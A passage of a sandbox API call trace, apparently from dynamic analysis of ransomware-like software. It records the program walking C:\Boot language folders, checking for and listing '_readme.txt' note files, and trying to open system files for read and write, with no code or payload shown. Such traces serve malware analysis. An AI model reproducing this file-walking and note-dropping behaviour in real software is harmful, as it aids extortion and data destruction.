out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.014] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.014] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0130.014] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0130.015] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.015] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.015] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.015] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.015] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.015] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0130.015] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.015] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe386c600, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.016] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned=".txt" [0130.016] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe386c600, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.016] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.016] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.016] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.016] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.016] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.016] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0130.016] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.016] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.016] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.017] PathFindFileNameW (pszPath="") returned="" [0130.017] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.017] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.017] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.017] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.017] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.017] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0130.017] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.018] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.018] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0130.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.018] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0130.018] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3892760, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3892760, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.018] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3892760, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3892760, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.018] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.019] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0130.019] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.019] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3892760, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3892760, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3892760, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.019] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned=".txt" [0130.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.019] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3892760, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3892760, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3892760, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.019] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0130.019] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.019] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.024] 